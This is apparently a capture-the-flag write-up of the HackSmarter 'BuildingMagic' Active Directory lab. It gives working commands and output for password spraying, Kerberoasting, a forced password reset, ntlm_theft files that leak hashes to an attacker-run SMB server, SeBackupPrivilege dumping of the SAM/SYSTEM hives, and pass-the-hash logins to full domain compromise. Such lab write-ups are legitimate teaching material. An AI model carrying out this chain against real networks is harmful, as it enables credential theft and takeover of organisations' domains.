Overview

Machine Logo

BuildingMagic is an Easy machine from HackSmarter that starts off with cracking hashes from a leaked database file, then using the newfound credentials to abuse misconfigurations in ActiveDirectory. After some Kerberoasting, a ForceChangePassword, and using the ntlm_theft tool, you’ll end up abusing SeBackupPrivilege for root.

Objective & Scope

Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment.

Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network.

Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain.

Needed /etc/hosts entries:

1
ip	dc01.buildingmagic.local buildingmagic.local

Nmap Scan

I’ll run nmap on all TCP ports with NSE:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nmap -sCV -p 3389,53,135,445,389,636,88,445 -vvvvv 10.1.116.112 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-28 19:16 EST
Nmap scan report for 10.1.116.112
Host is up, received echo-reply ttl 126 (0.079s latency).
Scanned at 2025-11-28 19:16:27 EST for 53s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 126 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-11-29 00:17:40Z)
135/tcp  open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: BUILDINGMAGIC.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 126
636/tcp  open  tcpwrapped    syn-ack ttl 126
3389/tcp open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2025-11-29T00:18:25+00:00; +1m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.BUILDINGMAGIC.LOCAL
| Issuer: commonName=DC01.BUILDINGMAGIC.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-02T21:29:10
| Not valid after:  2026-03-04T21:29:10
| MD5:   cb18:d563:ae1d:22d2:bd56:6b1c:ba62:94b1
| SHA-1: 4589:0eef:a106:c58c:d5a7:8fcc:0f87:1da5:1d84:6e69
| -----BEGIN CERTIFICATE-----
| MIIC9DCCAdygAwIBAgIQ<snip>pIyjfR5Tg/BHdg==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
|   Target_Name: BUILDINGMAGIC
|   NetBIOS_Domain_Name: BUILDINGMAGIC
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: BUILDINGMAGIC.LOCAL
|   DNS_Computer_Name: DC01.BUILDINGMAGIC.LOCAL
|   Product_Version: 10.0.20348
|_  System_Time: 2025-11-29T00:17:45+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m06s, deviation: 0s, median: 1m05s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-11-29T00:17:48
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 19792/tcp): CLEAN (Timeout)
|   Check 2 (port 44695/tcp): CLEAN (Timeout)
|   Check 3 (port 29812/udp): CLEAN (Timeout)
|   Check 4 (port 58131/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.62 seconds
           Raw packets sent: 11 (460B) | Rcvd: 8 (336B)

This is a Domain Controller (DC) with the FQDN of: dc01.buildingmagic.local so I’ll add that entry to my /etc/hosts file.

Recon

Leaked Database File

In the machine information there is a leaked database file:

1
2
3
4
5
6
7
8
9
10
11
id	username	full_name	role		password
1	r.widdleton	Ron Widdleton	Intern Builder	c4a21c4d438819d73d24851e7966229c
2	n.bottomsworth	Neville Bottomsworth Plannner	61ee643c5043eadbcdc6c9d1e3ebd298
3	l.layman	Luna Layman	Planner		8960516f904051176cc5ef67869de88f
4	c.smith		Chen Smith	Builder		bbd151e24516a48790b2cd5845e7f148
5	d.thomas	Dean Thomas	Builder		4d14ff3e264f6a9891aa6cea1cfa17cb
6	s.winnigan	Samuel Winnigan	HR Manager	078576a0569f4e0b758aedf650cb6d9a
7	p.jackson	Parvati Jackson	Shift Lead	eada74b2fa7f5e142ac412d767831b54
8	b.builder	Bob Builder	Electrician	dd4137bab3b52b55f99f18b7cd595448
9	t.ren		Theodore Ren	Safety Officer	bfaf794a81438488e57ee3954c27cd75
10	e.macmillan	Ernest Macmillan Surveyor	47d23284395f618bea1959e710bc68ef

This leak includes 10 MD5 hashes for several employees of the target company. You can dump that info into a file and run it through this command to extract the MD5 hashes only:

1
grep -Eo '\b[a-f0-9]{32}\b' filename

I’ll take these hashes and load them into CrackStation to see if any of them will crack:

Cracked Passwords

Two passwords cracked, I’ll save the users to a file and spray the leaked passwords with kerbrute. You can make a user wordlist with this command: grep -Eo '\b[a-z]\.[a-z]+'.

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  kerbrute passwordspray --dc dc01.buildingmagic.local -d buildingmagic.local users.txt 'lilronron'

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/28/25 - Ronnie Flathers @ropnop

2025/11/28 19:32:05 >  Using KDC(s):
2025/11/28 19:32:05 >  	dc01.buildingmagic.local:88

2025/11/28 19:32:06 >  [+] VALID LOGIN:	 r.widdleton@buildingmagic.local:lilronron
2025/11/28 19:32:06 >  Done! Tested 10 logins (1 successes) in 0.343 seconds
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  kerbrute passwordspray --dc dc01.buildingmagic.local -d buildingmagic.local users.txt 'shadowhex7'

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/28/25 - Ronnie Flathers @ropnop

2025/11/28 19:32:09 >  Using KDC(s):
2025/11/28 19:32:09 >  	dc01.buildingmagic.local:88

2025/11/28 19:32:09 >  Done! Tested 10 logins (0 successes) in 0.180 seconds

One valid login: r.widdleton:lilronron, I’ll be using this user from now on.

445/tcp - SMB

I’ll check for non-default shares using nxc:

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc smb dc01.buildingmagic.local -u r.widdleton -p lilronron --shares                                           
SMB         10.1.116.112    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:BUILDINGMAGIC.LOCAL) (signing:True) (SMBv1:False)
SMB         10.1.116.112    445    DC01             [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
SMB         10.1.116.112    445    DC01             [*] Enumerated shares
SMB         10.1.116.112    445    DC01             Share           Permissions     Remark
SMB         10.1.116.112    445    DC01             -----           -----------     ------
SMB         10.1.116.112    445    DC01             ADMIN$                          Remote Admin
SMB         10.1.116.112    445    DC01             C$                              Default share
SMB         10.1.116.112    445    DC01             File-Share                      Central Repository of Building Magic's files.
SMB         10.1.116.112    445    DC01             IPC$            READ            Remote IPC
SMB         10.1.116.112    445    DC01             NETLOGON                        Logon server share
SMB         10.1.116.112    445    DC01             SYSVOL                          Logon server share

There is one share: File-Share, I’ll get into that later when we have access.

389/tcp - LDAP

I’ll get a bloodhound dump to check for any misconfigurations using nxc:

1
2
3
4
5
6
7
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u r.widdleton -p lilronron --bloodhound --dns-tcp --dns-server 10.1.116.112 -c All
LDAP        10.1.116.112    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP        10.1.116.112    389    DC01             [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
LDAP        10.1.116.112    389    DC01             Resolved collection methods: dcom, container, objectprops, group, acl, rdp, trusts, session, localadmin, psremote
LDAP        10.1.116.112    389    DC01             Done in 00M 16S
LDAP        10.1.116.112    389    DC01             Compressing output into /root/.nxc/logs/DC01_10.1.116.112_2025-11-28_193427_bloodhound.zip
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  cp /root/.nxc/logs/DC01_10.1.116.112_2025-11-28_193427_bloodhound.zip ~/bloodhound/buildingmagic.zip

Auth as r.haggard

Looking in bloodhound under the List all Kerberoastable Accounts query, I see that the user r.haggard is Kerberoastable because he has this SPN set:

1
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111

I’ll use impacket-GetUserSPNs to perform this attack:

1
2
3
4
5
6
7
8
9
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-GetUserSPNs buildingmagic.local/r.widdleton:lilronron -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName                      Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------------------  ---------  --------  --------------------------  --------------------------  ----------
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111  r.haggard            2025-05-15 17:09:04.002067  2025-05-15 18:34:51.644710

[-] CCache file is not found. Skipping...
$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$ec2e2b90e380193285d87d113d2125f6$2c9512dd2e845ead731d8e99e3cbffcf5e47ce89534a768c752e6354483c4cbdded823c153ad357d989b6d400dea86e641cd67f61b2cafc5bf7b74b15fb03e908ae08ce2afc9383a461cbbfb5b414391<snip>a96470bde330c34

I’ll crack this hash using hashcat:

1
2
3
4
5
6
7
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  hashcat -a 0 r.haggard.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$ec2<snip>30c34:rubeushagrid

The hash cracks to rubeushagrid so we have a new set of credentials:

1
r.haggard \ rubeushagrid

Auth as h.potch

Looking at what Outbound control our user has, I see a ForceChangePassword to h.potch:

To abuse this I’ll use bloodyAD:

1
2
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  bloodyAD --host dc01.buildingmagic.local -u r.haggard -p rubeushagrid set password h.potch Password123 
[+] Password changed successfully!

And now I can auth as this user:

1
2
3
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u h.potch -p Password123
LDAP        10.1.116.112    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP        10.1.116.112    389    DC01             [+] BUILDINGMAGIC.LOCAL\h.potch:Password123

Auth as h.grangon

Revisiting SMB, I see that I now have Read & Write over the share we came across earlier:

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc smb dc01.buildingmagic.local -u h.potch -p Password123 --shares
SMB         10.1.116.112    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:BUILDINGMAGIC.LOCAL) (signing:True) (SMBv1:False)
SMB         10.1.116.112    445    DC01             [+] BUILDINGMAGIC.LOCAL\h.potch:Password123
SMB         10.1.116.112    445    DC01             [*] Enumerated shares
SMB         10.1.116.112    445    DC01             Share           Permissions     Remark
SMB         10.1.116.112    445    DC01             -----           -----------     ------
SMB         10.1.116.112    445    DC01             ADMIN$                          Remote Admin
SMB         10.1.116.112    445    DC01             C$                              Default share
SMB         10.1.116.112    445    DC01             File-Share      READ,WRITE      Central Repository of Building Magic's files.
SMB         10.1.116.112    445    DC01             IPC$            READ            Remote IPC
SMB         10.1.116.112    445    DC01             NETLOGON        READ            Logon server share
SMB         10.1.116.112    445    DC01             SYSVOL          READ            Logon server share

I’ll connect to the share using impacket-smbclient:

1
2
3
4
5
6
7
8
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-smbclient buildingmagic.local/h.potch:Password123@dc01.buildingmagic.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use File-Share
# ls
drw-rw-rw-          0  Fri Nov 28 19:40:58 2025 .
drw-rw-rw-          0  Tue Sep  2 15:37:28 2025 ..

The share is empty, the only interesting thing here is that I have Write, so I can drop files in here. One thing I usually try to do in these scenarios is generate files that have UNC paths that point to my fake SMB Server using the tool ntlm_theft:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  python3 /opt/tools/ntlm_theft/ntlm_theft.py --generate all -f xjr -s 10.200.10.156
Created: xjr/xjr.scf (BROWSE TO FOLDER)
Created: xjr/xjr-(url).url (BROWSE TO FOLDER)
Created: xjr/xjr-(icon).url (BROWSE TO FOLDER)
Created: xjr/xjr.lnk (BROWSE TO FOLDER)
Created: xjr/xjr.rtf (OPEN)
Created: xjr/xjr-(stylesheet).xml (OPEN)
Created: xjr/xjr-(fulldocx).xml (OPEN)
Created: xjr/xjr.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: xjr/xjr-(includepicture).docx (OPEN)
Created: xjr/xjr-(remotetemplate).docx (OPEN)
Created: xjr/xjr-(frameset).docx (OPEN)
Created: xjr/xjr-(externalcell).xlsx (OPEN)
Created: xjr/xjr.wax (OPEN)
Created: xjr/xjr.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: xjr/xjr.asx (OPEN)
Created: xjr/xjr.jnlp (OPEN)
Created: xjr/xjr.application (DOWNLOAD AND OPEN)
Created: xjr/xjr.pdf (OPEN AND ALLOW)
Created: xjr/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: xjr/Autorun.inf (BROWSE TO FOLDER)
Created: xjr/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Now I’ll drop some of the files that are more likely to work into the share:

1
2
3
4
5
6
7
8
9
10
11
12
13
# lcd xjr
xjr
# put xjr.lnk
# put desktop.ini
# put xjr-(url).url
# put xjr-(icon).url
# ls
drw-rw-rw-          0  Fri Nov 28 19:44:50 2025 .
drw-rw-rw-          0  Tue Sep  2 15:37:28 2025 ..
-rw-rw-rw-         49  Fri Nov 28 19:44:40 2025 desktop.ini
-rw-rw-rw-        110  Fri Nov 28 19:44:51 2025 xjr-(icon).url
-rw-rw-rw-         58  Fri Nov 28 19:44:47 2025 xjr-(url).url
-rw-rw-rw-       2164  Fri Nov 28 19:44:34 2025 xjr.lnk

And I’ll start an SMB Server to capture the NetNTLMv2 hash using impacket-smbserver:

1
2
3
4
5
6
7
8
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-smbserver s . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

And after about 30 seconds, we capture the hash for h.grangon:

1
2
3
4
[*] Incoming connection (10.1.116.112,50267)
[*] AUTHENTICATE_MESSAGE (BUILDINGMAGIC\h.grangon,DC01)
[*] User DC01\h.grangon authenticated successfully
[*] h.grangon::BUILDINGMAGIC:aaaaaaaaaaaaaaaa:826<snip>000000

I’ll take this hash and crack it via hashcat:

1
2
3
4
5
6
7
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  hashcat -a 0 h.grangon.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

H.GRANGON::BUILDINGMAGIC:aaaaaaaaaaaaaaaa:<snip>00000:magic4ever

The hash cracks to: magic4ever, giving us another set of credentials:

1
h.grangon \ magic4ever

This user is apart of the Remote Management Users group so with this user I can WinRM to the machine via evil-winrm:

1
2
3
4
5
6
7
8
9
10
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  evil-winrm -i dc01.buildingmagic.local -u h.grangon -p magic4ever

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.grangon\Documents>

And with that I can get the user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\h.grangon\Documents> cd ..\Desktop
ls
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> ls


    Directory: C:\Users\h.grangon\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/2/2025   7:41 PM           2308 Microsoft Edge.lnk
-a----          9/2/2025   7:41 PM             32 user.txt
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> cat user.txt
701b<snip>

Auth as a.flatch

Running whoami /priv, I can see that my user has SeBackupPrivilege:

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

This privilege is intended to allow the user to Back up files and directories. But as an attacker you can use it to backup the SAM & SYSTEM hives, which contain all of the NTLM hashes across the domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> mkdir goodies


    Directory: C:\Users\h.grangon\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/28/2025   4:49 PM                goodies


*Evil-WinRM* PS C:\Users\h.grangon\Desktop> cd goodies
*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> reg save hklm\sam C:\Users\h.grangon\Desktop\goodies\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> reg save hklm\system C:\Users\h.grangon\Desktop\goodies\system
The operation completed successfully.

Now I can download these files using the download command in evil-winrm:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> download sam

Info: Downloading C:\Users\h.grangon\Desktop\goodies\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> download system

Info: Downloading C:\Users\h.grangon\Desktop\goodies\system to system

Info: Download successful!

And using the tool impacket-secretsdump, I can locally parse these files to extract the Administrator’s NT hash:

1
2
3
4
5
6
7
8
9
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xf61a94fb13f74350a1f87f509c8c455c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

But the Administrator’s hash doesn’t work directly. So I’ll get a new full users list and spray the hash:

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u h.grangon -p magic4ever --users | grep -vE '\b(Administrator|Guest|krbtgt|-Username-)\b' | awk '{print $5}'
[*]
[+]
[*]
-Username-
h.potch
r.widdleton
r.haggard
h.grangon
a.flatch
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u h.grangon -p magic4ever --users | grep -vE '\b(Administrator|Guest|krbtgt|)\b' | awk '{print $5}' > users.txt

I removed the -Username- part to get this list:

1
2
3
4
5
6
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  cat users.txt
h.potch
r.widdleton
r.haggard
h.grangon
a.flatch

And I can spray the NT hash using nxc:

1
2
3
4
5
6
7
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u users.txt -H 520126a03f5d5a8d836f1c4f34ede7ce --no-bruteforce
LDAP        10.1.116.112    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP        10.1.116.112    389    DC01             [-] BUILDINGMAGIC.LOCAL\h.potch:520126a03f5d5a8d836f1c4f34ede7ce
LDAP        10.1.116.112    389    DC01             [-] BUILDINGMAGIC.LOCAL\r.widdleton:520126a03f5d5a8d836f1c4f34ede7ce
LDAP        10.1.116.112    389    DC01             [-] BUILDINGMAGIC.LOCAL\r.haggard:520126a03f5d5a8d836f1c4f34ede7ce
LDAP        10.1.116.112    389    DC01             [-] BUILDINGMAGIC.LOCAL\h.grangon:520126a03f5d5a8d836f1c4f34ede7ce
LDAP        10.1.116.112    389    DC01             [+] BUILDINGMAGIC.LOCAL\a.flatch:520126a03f5d5a8d836f1c4f34ede7ce

This works for the user a.flatch which is in the Administrators group, so I can WinRM as this user and obtain the root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  evil-winrm -i dc01.buildingmagic.local -u a.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\a.flatch\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/12/2025   1:37 PM                nssm-2.24
-a----          9/2/2025   4:24 PM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9557e65<snip>

Thoughts

This was a great machine and I liked the leaked database file part. I was a bit stuck at the end because I was going off of the users list obtained from the leaked database file, and I had forgot to dump a new one with every AD user. I’d give this machine a solid 8/10.